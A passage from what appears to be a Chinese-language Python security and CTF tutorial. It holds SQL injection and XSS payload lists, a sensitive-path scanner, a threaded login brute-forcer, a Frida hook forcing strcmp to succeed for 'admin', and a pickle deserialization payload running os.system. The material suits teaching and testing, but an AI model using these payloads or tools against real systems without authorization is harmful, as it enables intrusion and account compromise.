    rip = int(gdb.parse_and_eval("$rip"))

    frame_size = rbp - rsp
    log.info(f"栈帧大小: {frame_size} 字节")
    log.info(f"返回地址 @ 0x{rip:x}")

    # 读取栈上的数据
    data = read_memory(rsp, frame_size + 8)
    return data

四、Web 安全

SQL 注入检测

import requests

def detect_sqli(url, params):
    """基础 SQL 注入检测"""
    # 常见 SQL 注入 Payload
    sqli_payloads = [
        "'",
        "\"",
        "' OR '1'='1",
        "\" OR \"1\"=\"1",
        "' OR '1'='1' --",
        "' UNION SELECT NULL--",
        "1' AND '1'='1",
        "1' AND '1'='2",
        "1 AND 1=1",
        "1 AND 1=2",
        "' OR 1=1#",
        "admin'--",
    ]

    # 基于错误的检测
    error_signatures = [
        "sql syntax",
        "mysql_fetch",
        "ORA-",
        "PostgreSQL",
        "sqlite3",
        "Microsoft OLE DB",
        "unclosed quotation",
        "syntax error",
    ]

    results = []
    for param_name, original_value in params.items():
        for payload in sqli_payloads:
            test_params = params.copy()
            test_params[param_name] = payload

            try:
                resp = requests.get(url, params=test_params, timeout=10)
                content = resp.text.lower()

                # 检查是否出现 SQL 错误
                for sig in error_signatures:
                    if sig.lower() in content:
                        results.append({
                            "param": param_name,
                            "payload": payload,
                            "type": "error-based",
                            "signature": sig,
                        })
                        break

                # 基于布尔差异的检测
                if payload in ["' OR '1'='1", "' OR '1'='1' --"]:
                    true_resp = resp
                elif payload in ["' OR '1'='2", "' AND '1'='2'"]:
                    false_resp = resp

            except requests.exceptions.RequestException:
                continue

    # 布尔盲注检测:比较 true 条件和 false 条件的响应差异
    try:
        if len(true_resp.text) != len(false_resp.text):
            results.append({
                "param": param_name,
                "type": "boolean-based blind",
                "note": f"响应长度差异: true={len(true_resp.text)}, false={len(false_resp.text)}"
            })
    except:
        pass

    return results

# ===== SQLMap API 封装 =====
def sqlmap_scan(target_url, level=1, risk=1):
    """调用 SQLMap REST API 进行自动化 SQL 注入扫描"""
    import time

    api_url = "http://127.0.0.1:8775"   # sqlmapapi 默认地址

    # 创建任务
    task_id = requests.get(f"{api_url}/task/new").json()["taskid"]

    # 设置目标
    requests.post(f"{api_url}/scan/{task_id}/start",
                  json={"url": target_url, "level": level, "risk": risk})

    # 等待扫描完成
    while True:
        status = requests.get(f"{api_url}/scan/{task_id}/status").json()
        if status["status"] == "terminated":
            break
        time.sleep(5)

    # 获取结果
    results = requests.get(f"{api_url}/scan/{task_id}/results").json()
    return results

XSS 检测

import requests
from html import escape, unescape
from urllib.parse import urlencode

def detect_xss(url, params):
    """基础反射型 XSS 检测"""
    xss_payloads = [
        '<script>alert("XSS")</script>',
        '<img src=x onerror=alert("XSS")>',
        '<svg onload=alert("XSS")>',
        '"><script>alert("XSS")</script>',
        "';alert('XSS');//",
        '<iframe src="javascript:alert(\'XSS\')">',
        '<body onload=alert("XSS")>',
        '{{7*7}}',                          # SSTI 检测
        '${7*7}',                           # 表达式注入检测
        '<marquee onstart=alert("XSS")>',
    ]

    findings = []
    for param_name in params:
        for payload in xss_payloads:
            test_params = params.copy()
            test_params[param_name] = payload

            resp = requests.get(url, params=test_params, timeout=10)

            # 检查 payload 是否原样出现在响应中(未被转义)
            if payload in resp.text:
                findings.append({
                    "param": param_name,
                    "payload": payload,
                    "type": "reflected (unescaped)",
                })
            # 检查部分转义的情况
            elif escape(payload) not in resp.text and payload.replace('"', '&quot;') in resp.text:
                findings.append({
                    "param": param_name,
                    "payload": payload,
                    "type": "reflected (partial escape)",
                })

    return findings

目录扫描与信息收集

import requests
from concurrent.futures import ThreadPoolExecutor

def directory_scan(base_url, wordlist, extensions=None, threads=50):
    """Web 目录/文件扫描"""
    if extensions is None:
        extensions = ["", ".php", ".html", ".txt", ".bak", ".old"]

    found = []

    def check_path(path):
        url = f"{base_url.rstrip('/')}/{path}"
        try:
            resp = requests.get(url, timeout=5, allow_redirects=False)
            if resp.status_code not in [404, 403]:
                return (url, resp.status_code, len(resp.text))
        except:
            pass
        return None

    # 生成候选路径
    candidates = []
    for word in wordlist:
        for ext in extensions:
            candidates.append(f"{word}{ext}")

    with ThreadPoolExecutor(max_workers=threads) as executor:
        futures = {executor.submit(check_path, path): path for path in candidates}
        for future in futures:
            result = future.result()
            if result:
                url, status, size = result
                print(f"[{status}] {url} ({size} bytes)")
                found.append(result)

    return found

# 常见敏感路径
common_paths = [
    "robots.txt", ".git/HEAD", ".env", ".htaccess", "wp-config.php.bak",
    "backup.sql", "phpinfo.php", ".svn/entries", "server-status",
    "admin/", "api/", "debug/", "config/", ".DS_Store", "web.config",
]

# directory_scan("http://target.com", common_paths)

密码爆破

import requests
import itertools
import string
from concurrent.futures import ThreadPoolExecutor

def brute_force_login(url, username, password_field, username_field,
                      wordlist, method="POST", fail_pattern="Invalid"):
    """基于字典的密码爆破"""
    found = []

    def try_password(password):
        data = {username_field: username, password_field: password}
        try:
            if method.upper() == "POST":
                resp = requests.post(url, data=data, timeout=10,
                                     allow_redirects=False)
            else:
                resp = requests.get(url, params=data, timeout=10,
                                    allow_redirects=False)

            # 根据响应判断是否成功
            if fail_pattern.lower() not in resp.text.lower():
                if resp.status_code in [200, 301, 302]:
                    return (username, password, resp.status_code)
        except:
            pass
        return None

    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = {executor.submit(try_password, pw): pw for pw in wordlist}
        for future in futures:
            result = future.result()
            if result:
                print(f"[+] 成功: {result[0]}:{result[1]} (HTTP {result[2]})")
                found.append(result)

    return found

def generate_passwords(min_len=4, max_len=6, charset=None):
    """生成暴力破解密码字典"""
    if charset is None:
        charset = string.ascii_lowercase + string.digits

    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield ''.join(combo)

五、逆向工程辅助

字节模式搜索(YARA 风格)

import re

def search_bytes(data, pattern):
    """
    在二进制数据中搜索字节模式
    pattern: 十六进制字符串,支持 ?? 作为通配符
    例: "48 89 e5 ?? ?? ?? 48 83 ec"
    """
    # 将模式转换为正则表达式
    regex_pattern = ""
    for byte in pattern.split():
        if byte == "??":
            regex_pattern += "."
        else:
            regex_pattern += "\\x" + byte

    matches = []
    for match in re.finditer(regex_pattern.encode(), data):
        matches.append(match.start())
        print(f"[+] 匹配于偏移 0x{match.start():08X}: "
              f"{data[match.start():match.start()+16].hex()}")

    return matches

# 示例:搜索 x86 函数序言 (push rbp; mov rbp, rsp)
# push rbp = 55, mov rbp rsp = 48 89 e5
# search_bytes(binary_data, "55 48 89 e5")

# ===== 特征码提取 =====
def extract_unique_strings(filepath, min_length=4):
    """从二进制文件中提取可打印字符串"""
    import string
    with open(filepath, 'rb') as f:
        data = f.read()

    printable = set(string.printable.encode())
    strings = []
    current = b""

    for byte in data:
        if bytes([byte]) in printable and byte != 0:
            current += bytes([byte])
        else:
            if len(current) >= min_length:
                strings.append(current.decode('ascii', errors='ignore'))
            current = b""

    # 去重并排序
    unique = sorted(set(strings))

    # 分类
    urls = [s for s in unique if s.startswith(('http://', 'https://'))]
    ips = [s for s in unique if re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', s)]
    emails = [s for s in unique if '@' in s and '.' in s.split('@')[-1]]

    print(f"提取到 {len(unique)} 个字符串")
    print(f"  URL: {len(urls)}")
    print(f"  IP: {len(ips)}")
    print(f"  Email: {len(emails)}")

    return unique

Frida:动态插桩

Frida 是一个动态二进制插桩工具,可以在运行时 hook 函数、修改行为。

# pip install frida-tools frida
import frida

def hook_function(process_name, function_name, module_name=None):
    """Hook 目标进程中的函数"""
    # Frida JavaScript 脚本
    js_code = f"""
    Interceptor.attach(Module.findExportByName("{module_name || 'null'}", "{function_name}"), {{
        onEnter: function(args) {{
            console.log("[+] {function_name} called");
            // 读取参数
            // console.log("arg0: " + args[0].readUtf8String());
            // console.log("arg1: " + args[1].toInt32());
        }},
        onLeave: function(retval) {{
            console.log("[+] {function_name} returned: " + retval);
            // 修改返回值
            // retval.replace(ptr(0x1));
        }}
    }});
    """

    # 附加到进程
    session = frida.attach(process_name)

    # 注入脚本
    script = session.create_script(js_code)
    script.on('message', lambda message, data: print(f"[*] {message}"))
    script.load()

    print(f"[*] 已 Hook {function_name},按 Ctrl+C 退出")
    try:
        import sys
        sys.stdin.read()
    except KeyboardInterrupt:
        session.detach()

# Frida 内联 Hook 示例:修改函数行为
inline_hook_js = """
Interceptor.attach(Module.findExportByName(null, "strcmp"), {
    onEnter: function(args) {
        this.s1 = args[0].readUtf8String();
        this.s2 = args[1].readUtf8String();
    },
    onLeave: function(retval) {
        // 让 strcmp 始终返回 0(相等)
        if (this.s1 === "admin" || this.s2 === "admin") {
            console.log("[*] strcmp('" + this.s1 + "', '" + this.s2 + "') -> forced 0");
            retval.replace(0);
        }
    }
});
"""

六、取证与恶意软件分析

文件类型识别

import magic       # pip install python-magic (Linux) / python-magic-bin (Windows)

def identify_file(filepath):
    """识别文件真实类型(不依赖扩展名)"""
    # MIME 类型
    mime = magic.Magic(mime=True)
    file_type = mime.from_file(filepath)
    print(f"MIME 类型: {file_type}")

    # 详细描述
    desc = magic.Magic()
    description = desc.from_file(filepath)
    print(f"描述: {description}")

    # 常见文件魔数
    MAGIC_BYTES = {
        b'\x7fELF':         'ELF 可执行文件',
        b'MZ':              'PE 可执行文件 (Windows)',
        b'\x89PNG':         'PNG 图片',
        b'\xff\xd8\xff':    'JPEG 图片',
        b'GIF8':            'GIF 图片',
        b'PK\x03\x04':     'ZIP 压缩包 / Office 文档',
        b'Rar!\x1a\x07':   'RAR 压缩包',
        b'\x1f\x8b':       'GZIP 压缩包',
        b'%PDF':            'PDF 文档',
        b'\xca\xfe\xba\xbe': 'Mach-O / Java Class',
        b'BZ':              'BZIP2 压缩包',
    }

    with open(filepath, 'rb') as f:
        header = f.read(16)

    for magic_bytes, desc in MAGIC_BYTES.items():
        if header.startswith(magic_bytes):
            print(f"魔数匹配: {desc}")
            break

    return file_type, description

def file_hash_all(filepath):
    """计算文件的多种哈希"""
    import hashlib

    hashers = {
        'MD5': hashlib.md5(),
        'SHA1': hashlib.sha1(),
        'SHA256': hashlib.sha256(),
        'SHA512': hashlib.sha512(),
    }

    with open(filepath, 'rb') as f:
        while chunk := f.read(8192):
            for h in hashers.values():
                h.update(chunk)

    results = {}
    for name, h in hashers.items():
        digest = h.hexdigest()
        results[name] = digest
        print(f"{name}: {digest}")

    return results

VirusTotal 查询

import requests

class VirusTotalAPI:
    """VirusTotal API 封装(v3)"""

    BASE_URL = "https://www.virustotal.com/api/v3"

    def __init__(self, api_key):
        self.headers = {"x-apikey": api_key}

    def search_hash(self, file_hash):
        """通过哈希查询文件扫描结果"""
        resp = requests.get(
            f"{self.BASE_URL}/files/{file_hash}",
            headers=self.headers
        )
        if resp.status_code == 200:
            data = resp.json()
            attrs = data["data"]["attributes"]
            stats = attrs["last_analysis_stats"]
            print(f"文件名: {attrs.get('meaningful_name', 'N/A')}")
            print(f"类型: {attrs.get('type_description', 'N/A')}")
            print(f"大小: {attrs.get('size', 'N/A')} bytes")
            print(f"首次提交: {attrs.get('first_submission_date', 'N/A')}")
            print(f"检测结果: 恶意={stats['malicious']}, "
                  f"可疑={stats['suspicious']}, "
                  f"无害={stats['harmless']}, "
                  f"未检测={stats['undetected']}")
            return data
        elif resp.status_code == 404:
            print("该哈希在 VirusTotal 中无记录")
        return None

    def search_ip(self, ip):
        """查询 IP 地址的威胁情报"""
        resp = requests.get(
            f"{self.BASE_URL}/ip_addresses/{ip}",
            headers=self.headers
        )
        if resp.status_code == 200:
            data = resp.json()
            attrs = data["data"]["attributes"]
            print(f"IP: {ip}")
            print(f"国家: {attrs.get('country', 'N/A')}")
            print(f"AS号: {attrs.get('asn', 'N/A')}")
            print(f"所有者: {attrs.get('as_owner', 'N/A')}")
            stats = attrs.get("last_analysis_stats", {})
            print(f"恶意评分: {stats.get('malicious', 0)}")
            return data
        return None

# 使用示例:
# vt = VirusTotalAPI("your-api-key")
# vt.search_hash("44d88612fea8a8f36de82e1278abb02f")
# vt.search_ip("8.8.8.8")

简易 PE 恶意行为分析

def analyze_suspicious_pe(filepath):
    """静态分析 PE 文件中的可疑行为特征"""
    import pefile
    pe = pefile.PE(filepath)
    findings = []

    # 检查导入函数(高危 API)
    dangerous_apis = {
        # 进程操作
        "CreateRemoteThread":    "进程注入",
        "VirtualAllocEx":        "远程内存分配",
        "WriteProcessMemory":    "远程内存写入",
        "NtUnmapViewOfSection":  "进程掏空(Process Hollowing)",
        "QueueUserAPC":          "APC 注入",
        # 网络通信
        "URLDownloadToFile":     "下载文件",
        "InternetOpenUrl":       "网络请求",
        "WinHttpOpen":           "HTTP 通信",
        "WSAStartup":            "Winsock 初始化",
        # 持久化
        "RegSetValueEx":         "注册表写入",
        "RegCreateKeyEx":        "注册表创建",
        "CreateService":         "创建系统服务",
        # 反检测
        "IsDebuggerPresent":     "调试器检测",
        "CheckRemoteDebuggerPresent": "远程调试器检测",
        "NtQueryInformationProcess":  "进程信息查询(反调试)",
        "GetTickCount":          "时间检测(反调试)",
        # 信息收集
        "GetAsyncKeyState":      "键盘记录",
        "SetWindowsHookEx":      "键盘/鼠标 Hook",
        "OpenClipboard":         "剪贴板访问",
        # 文件操作
        "MoveFileEx":            "文件移动(可作删除)",
        "DeleteFileA":           "文件删除",
        "CopyFileA":             "文件复制",
        # 权限提升
        "AdjustTokenPrivileges": "权限提升",
        "OpenProcessToken":      "令牌操作",
        "ShellExecute":          "执行程序",
    }

    if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
        for entry in pe.DIRECTORY_ENTRY_IMPORT:
            for imp in entry.imports:
                if imp.name:
                    func_name = imp.name.decode()
                    if func_name in dangerous_apis:
                        findings.append({
                            "function": func_name,
                            "dll": entry.dll.decode(),
                            "threat": dangerous_apis[func_name],
                        })

    # 检查可疑节区名
    suspicious_sections = [".upx", "UPX0", "UPX1", ".aspack", ".adata"]
    for section in pe.sections:
        name = section.Name.decode().rstrip('\x00')
        if name in suspicious_sections:
            findings.append({
                "type": "packer",
                "detail": f"可疑节区名: {name}(可能被加壳)",
            })

    # 检查高熵值(可能是加密或压缩)
    import math
    for section in pe.sections:
        data = section.get_data()
        if len(data) == 0:
            continue
        byte_counts = [0] * 256
        for byte in data:
            byte_counts[byte] += 1
        entropy = -sum(
            (c / len(data)) * math.log2(c / len(data))
            for c in byte_counts if c > 0
        )
        if entropy > 7.0:
            name = section.Name.decode().rstrip('\x00')
            findings.append({
                "type": "high_entropy",
                "detail": f"节区 {name} 熵值 {entropy:.2f}(可能含加密/压缩数据)",
            })

    # 输出报告
    if findings:
        print(f"[!] 发现 {len(findings)} 个可疑特征:")
        for f in findings:
            if "threat" in f:
                print(f"  [API] {f['function']} ({f['dll']}) → {f['threat']}")
            else:
                print(f"  [{f['type']}] {f['detail']}")
    else:
        print("[+] 未发现明显可疑特征")

    return findings

七、网络协议分析

解析常见协议

import struct

def parse_ethernet_header(packet):
    """解析以太网帧头"""
    dst_mac = packet[0:6].hex(':')
    src_mac = packet[6:12].hex(':')
    eth_type = struct.unpack('!H', packet[12:14])[0]

    type_names = {0x0800: "IPv4", 0x0806: "ARP", 0x86DD: "IPv6"}
    print(f"  目的 MAC: {dst_mac}")
    print(f"  源 MAC:   {src_mac}")
    print(f"  类型:     0x{eth_type:04X} ({type_names.get(eth_type, 'Unknown')})")
    return eth_type, packet[14:]

def parse_ipv4_header(packet):
    """解析 IPv4 头"""
    version_ihl = packet[0]
    version = version_ihl >> 4
    ihl = (version_ihl & 0x0F) * 4      # 头部长度(字节)
    ttl = packet[8]
    protocol = packet[9]

    src_ip = '.'.join(str(b) for b in packet[12:16])
    dst_ip = '.'.join(str(b) for b in packet[16:20])

    proto_names = {1: "ICMP", 6: "TCP", 17: "UDP"}
    print(f"  IPv{version}, 头长={ihl}B, TTL={ttl}")
    print(f"  协议: {protocol} ({proto_names.get(protocol, 'Unknown')})")
    print(f"  源 IP: {src_ip}")
    print(f"  目的 IP: {dst_ip}")
    return protocol, ihl, packet[ihl:]

def parse_tcp_header(packet):
    """解析 TCP 头"""
    src_port, dst_port = struct.unpack('!HH', packet[0:4])
    seq_num = struct.unpack('!I', packet[4:8])[0]
    ack_num = struct.unpack('!I', packet[8:12])[0]
    data_offset = ((packet[12] >> 4) & 0x0F) * 4
    flags = packet[13]

    flag_names = []
    if flags & 0x01: flag_names.append("FIN")
    if flags & 0x02: flag_names.append("SYN")
    if flags & 0x04: flag_names.append("RST")
    if flags & 0x08: flag_names.append("PSH")
    if flags & 0x10: flag_names.append("ACK")
    if flags & 0x20: flag_names.append("URG")

    print(f"  {src_port}{dst_port}")
    print(f"  Seq={seq_num}, Ack={ack_num}")
    print(f"  Flags: [{', '.join(flag_names)}]")

    payload = packet[data_offset:]
    return src_port, dst_port, payload

DNS 解析与重绑定检测

import socket
import struct

def resolve_dns(domain, dns_server="8.8.8.8"):
    """手动构造并发送 DNS 查询"""
    # DNS Header
    header = struct.pack('>HHHHHH', 0xAAAA, 0x0100, 1, 0, 0, 0)

    # Question
    question = b''
    for label in domain.split('.'):
        question += struct.pack('B', len(label)) + label.encode()
    question += b'\x00\x00\x01\x00\x01'  # QTYPE=A, QCLASS=IN

    packet = header + question

    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(5)
        s.sendto(packet, (dns_server, 53))
        response, _ = s.recvfrom(4096)

    # 解析响应
    an_count = struct.unpack('>H', response[6:8])[0]
    answers = []
    offset = len(header) + len(question)

    for _ in range(an_count):
        # 跳过 name(压缩指针或标签)
        if response[offset] & 0xC0 == 0xC0:
            offset += 2
        else:
            while response[offset] != 0:
                offset += response[offset] + 1
            offset += 1

        rtype, rclass, ttl, rdlength = struct.unpack('>HHIH', response[offset:offset+10])
        offset += 10

        if rtype == 1:  # A 记录
            ip = '.'.join(str(b) for b in response[offset:offset+rdlength])
            answers.append({"type": "A", "ip": ip, "ttl": ttl})
            print(f"  A 记录: {ip} (TTL={ttl})")

        offset += rdlength

    return answers

八、自动化与工具开发

命令行参数解析

import argparse

def build_scanner_cli():
    """构建安全扫描器命令行工具"""
    parser = argparse.ArgumentParser(
        description="PyScanner - Python 安全扫描工具",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
示例:
  %(prog)s -t 192.168.1.1 -p 1-1000 --threads 100
  %(prog)s -t example.com -p 80,443,8080 --service-detect
  %(prog)s -u http://example.com --wordlist common.txt
        """
    )

    # 目标参数
    target = parser.add_argument_group("目标")
    target.add_argument("-t", "--target", required=True, help="目标 IP 或域名")
    target.add_argument("-p", "--ports", default="1-1024",
                        help="端口范围 (默认: 1-1024)")
    target.add_argument("-u", "--url", help="目标 URL (Web 扫描模式)")

    # 扫描选项
    scan = parser.add_argument_group("扫描选项")
    scan.add_argument("--threads", type=int, default=50, help="线程数 (默认: 50)")
    scan.add_argument("--timeout", type=float, default=2.0, help="超时秒数 (默认: 2.0)")
    scan.add_argument("--service-detect", action="store_true", help="启用服务识别")
    scan.add_argument("--wordlist", help="Web 目录爆破字典文件")

    # 输出选项
    output = parser.add_argument_group("输出选项")
    output.add_argument("-o", "--output", help="输出文件路径")
    output.add_argument("-v", "--verbose", action="store_true", help="详细输出")
    output.add_argument("-q", "--quiet", action="store_true", help="静默模式")

    args = parser.parse_args()

    # 解析端口范围
    if '-' in args.ports:
        start, end = args.ports.split('-')
        args.port_list = list(range(int(start), int(end) + 1))
    elif ',' in args.ports:
        args.port_list = [int(p) for p in args.ports.split(',')]
    else:
        args.port_list = [int(args.ports)]

    return args

# python scanner.py -t 192.168.1.1 -p 80,443,8080 --threads 100 -v

并发与异步

import asyncio
import aiohttp         # pip install aiohttp
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor

# ===== 异步 HTTP 批量请求(高性能扫描)=====
async def async_fetch(session, url, timeout=5):
    """异步 HTTP 请求"""
    try:
        async with session.get(url, timeout=timeout, ssl=False) as resp:
            return url, resp.status, len(await resp.read())
    except Exception:
        return url, -1, 0

async def async_scan(urls, concurrency=100):
    """异步批量扫描"""
    connector = aiohttp.TCPConnector(limit=concurrency)
    async with aiohttp.ClientSession(connector=connector) as session:
        tasks = [async_fetch(session, url) for url in urls]
        results = await asyncio.gather(*tasks, return_exceptions=True)

    for result in results:
        if isinstance(result, tuple):
            url, status, size = result
            if status > 0:
                print(f"[{status}] {url} ({size} bytes)")

    return results

# 运行异步扫描
# urls = [f"http://192.168.1.{i}" for i in range(1, 255)]
# asyncio.run(async_scan(urls))

# ===== 多进程(CPU 密集型任务,如哈希计算)=====
def compute_hashes(filepath):
    """多进程计算文件哈希"""
    import hashlib

    def hash_chunk(args):
        chunk, offset = args
        h = hashlib.sha256(chunk).hexdigest()
        return offset, h

    chunks = []
    with open(filepath, 'rb') as f:
        offset = 0
        while chunk := f.read(1024 * 1024):  # 1MB 块
            chunks.append((chunk, offset))
            offset += len(chunk)

    with ProcessPoolExecutor() as executor:
        results = executor.map(hash_chunk, chunks)

    return sorted(results, key=lambda x: x[0])

日志与报告生成

import logging
import json
from datetime import datetime

# ===== 结构化日志 =====
def setup_logging(log_file="scan.log", verbose=False):
    """配置安全扫描日志"""
    logger = logging.getLogger("scanner")
    logger.setLevel(logging.DEBUG if verbose else logging.INFO)

    # 文件输出
    fh = logging.FileHandler(log_file, encoding='utf-8')
    fh.setLevel(logging.DEBUG)

    # 控制台输出
    ch = logging.StreamHandler()
    ch.setLevel(logging.DEBUG if verbose else logging.INFO)

    formatter = logging.Formatter(
        '%(asctime)s [%(levelname)s] %(message)s',
        datefmt='%Y-%m-%d %H:%M:%S'
    )
    fh.setFormatter(formatter)
    ch.setFormatter(formatter)

    logger.addHandler(fh)
    logger.addHandler(ch)
    return logger

# ===== JSON 报告 =====
class ScanReport:
    """扫描报告生成器"""

    def __init__(self, target):
        self.target = target
        self.start_time = datetime.now().isoformat()
        self.findings = []

    def add_finding(self, category, severity, detail):
        self.findings.append({
            "category": category,
            "severity": severity,    # critical / high / medium / low / info
            "detail": detail,
            "timestamp": datetime.now().isoformat(),
        })

    def to_json(self, filepath=None):
        report = {
            "target": self.target,
            "scan_time": self.start_time,
            "total_findings": len(self.findings),
            "by_severity": {},
            "findings": self.findings,
        }

        # 按严重性统计
        for f in self.findings:
            sev = f["severity"]
            report["by_severity"][sev] = report["by_severity"].get(sev, 0) + 1

        json_str = json.dumps(report, indent=2, ensure_ascii=False)
        if filepath:
            with open(filepath, 'w', encoding='utf-8') as f:
                f.write(json_str)
            print(f"[*] 报告已保存至 {filepath}")
        return json_str

# 使用示例:
# report = ScanReport("192.168.1.1")
# report.add_finding("open_port", "info", "Port 80/tcp open (HTTP)")
# report.add_finding("vuln", "high", "SQL Injection in /login parameter 'username'")
# report.to_json("scan_report.json")

九、常用安全 Python 库速查

安装 用途
requests pip install requests HTTP 请求,Web 安全基础
pwntools pip install pwntools CTF 与漏洞利用开发
scapy pip install scapy 数据包构造与嗅探
pycryptodome pip install pycryptodome 密码学(AES, RSA, SHA 等)
capstone pip install capstone 多架构反汇编引擎
keystone pip install keystone-engine 多架构汇编引擎
unicorn pip install unicorn CPU 模拟器(执行 shellcode)
angr pip install angr 符号执行与二进制分析
pefile pip install pefile PE 文件解析
lief pip install lief ELF/PE/Mach-O 解析
frida pip install frida-tools 动态二进制插桩
ropper pip install ropper ROP gadget 搜索
aiohttp pip install aiohttp 异步 HTTP(高性能扫描)
paramiko pip install paramiko SSH 协议客户端
impacket pip install impacket Windows 协议套件(SMB, Kerberos 等)
yara-python pip install yara-python 恶意软件特征匹配
volatility3 pip install volatility3 内存取证分析
beautifulsoup4 pip install beautifulsoup4 HTML 解析
selenium pip install selenium 浏览器自动化(XSS 测试等)
flask pip install flask 快速搭建 CTF 靶场或 Web 服务
mitmproxy pip install mitmproxy 中间人代理与流量分析

十、实战模板:一个完整的端口扫描器

将上述知识整合为一个可用的安全工具。

#!/usr/bin/env python3
"""
PyPortScan - 一个简洁的端口扫描器
用法: python scanner.py <target> [ports] [--threads N]
"""

import socket
import argparse
import time
import json
from concurrent.futures import ThreadPoolExecutor, as_completed

class PortScanner:
    def __init__(self, target, timeout=2, threads=100):
        self.target = target
        self.timeout = timeout
        self.threads = threads
        self.results = []

        # 解析目标
        try:
            self.ip = socket.gethostbyname(target)
            print(f"[*] 目标: {target} ({self.ip})")
        except socket.gaierror:
            print(f"[!] 无法解析: {target}")
            raise

    def scan_port(self, port):
        """扫描单个端口"""
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(self.timeout)
                result = s.connect_ex((self.ip, port))
                if result == 0:
                    # 尝试获取服务名
                    try:
                        service = socket.getservbyport(port)
                    except OSError:
                        service = "unknown"
                    # 尝试抓 banner
                    banner = self._grab_banner(port)
                    return {"port": port, "state": "open",
                            "service": service, "banner": banner}
        except:
            pass
        return None

    def _grab_banner(self, port):
        """尝试获取服务 banner"""
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(2)
                s.connect((self.ip, port))
                s.send(b"HEAD / HTTP/1.1\r\nHost: test\r\n\r\n")
                banner = s.recv(1024).decode(errors='ignore').strip()
                return banner[:200]
        except:
            return ""

    def scan(self, ports):
        """多线程扫描"""
        print(f"[*] 扫描 {len(ports)} 个端口 (线程数: {self.threads})")
        start = time.time()

        with ThreadPoolExecutor(max_workers=self.threads) as executor:
            futures = {executor.submit(self.scan_port, port): port
                       for port in ports}
            for future in as_completed(futures):
                result = future.result()
                if result:
                    self.results.append(result)
                    port = result["port"]
                    svc = result["service"]
                    banner = result["banner"][:50] if result["banner"] else ""
                    line = f"[+] {port}/tcp  OPEN  {svc}"
                    if banner:
                        line += f"  ({banner})"
                    print(line)

        elapsed = time.time() - start
        self.results.sort(key=lambda x: x["port"])
        print(f"\n[*] 扫描完成: {len(self.results)} 个开放端口, 耗时 {elapsed:.2f}s")
        return self.results

    def export_json(self, filepath):
        """导出 JSON 报告"""
        report = {
            "target": self.target,
            "ip": self.ip,
            "scan_time": time.strftime("%Y-%m-%d %H:%M:%S"),
            "open_ports": self.results,
        }
        with open(filepath, 'w') as f:
            json.dump(report, f, indent=2)
        print(f"[*] 报告已保存至 {filepath}")


def parse_ports(port_str):
    """解析端口参数: '80', '80,443', '1-1024' """
    ports = set()
    for part in port_str.split(','):
        if '-' in part:
            start, end = part.split('-')
            ports.update(range(int(start), int(end) + 1))
        else:
            ports.add(int(part))
    return sorted(ports)


def main():
    parser = argparse.ArgumentParser(description="PyPortScan 端口扫描器")
    parser.add_argument("target", help="目标 IP 或域名")
    parser.add_argument("ports", nargs="?", default="1-1024",
                        help="端口范围 (默认: 1-1024)")
    parser.add_argument("--threads", type=int, default=100, help="线程数")
    parser.add_argument("--timeout", type=float, default=2.0, help="超时秒数")
    parser.add_argument("-o", "--output", help="输出 JSON 报告路径")

    args = parser.parse_args()
    ports = parse_ports(args.ports)

    scanner = PortScanner(args.target, args.timeout, args.threads)
    scanner.scan(ports)

    if args.output:
        scanner.export_json(args.output)


if __name__ == "__main__":
    main()

# 用法示例:
# python scanner.py 192.168.1.1 22,80,443,3306,8080 --threads 50
# python scanner.py scanme.nmap.org 1-1000 -o report.json

附录:CTF 中的 Python 小技巧

# ===== 快速 Base64 解码 =====
import base64
data = base64.b64decode("SGVsbG8gV29ybGQ=")

# ===== 异或解密 =====
def xor_decrypt(data, key):
    return bytes([b ^ key[i % len(key)] for i, b in enumerate(data)])

# ===== 字节转整数(大端/小端)=====
int.from_bytes(b'\x01\x02\x03\x04', 'big')     # 0x01020304
int.from_bytes(b'\x01\x02\x03\x04', 'little')   # 0x04030201

# ===== 快速求最大公约数与模逆 =====
from math import gcd
def mod_inverse(a, m):
    """扩展欧几里得算法求模逆: a * x ≡ 1 (mod m)"""
    if gcd(a, m) != 1:
        return None
    return pow(a, -1, m)   # Python 3.8+ 内置支持

# ===== 快速因式分解(小整数)=====
def factorize(n):
    """试除法因式分解"""
    factors = []
    d = 2
    while d * d <= n:
        while n % d == 0:
            factors.append(d)
            n //= d
        d += 1
    if n > 1:
        factors.append(n)
    return factors

# ===== Python 反序列化漏洞演示 =====
# 警告: pickle 反序列化不可信数据是极其危险的!
import pickle
import os

class ExploitPayload:
    """恶意 pickle 载荷(仅用于演示,切勿用于非法用途)"""
    def __reduce__(self):
        # 当 pickle.loads() 执行时,会调用 os.system("id")
        return (os.system, ("id",))

# payload = pickle.dumps(ExploitPayload())
# pickle.loads(payload)  # 执行 os.system("id") — 远程代码执行!

# 防御:永远不要 pickle.loads() 不可信数据
# 安全替代:json, msgpack, protobuf

2026.05.11

进一步学习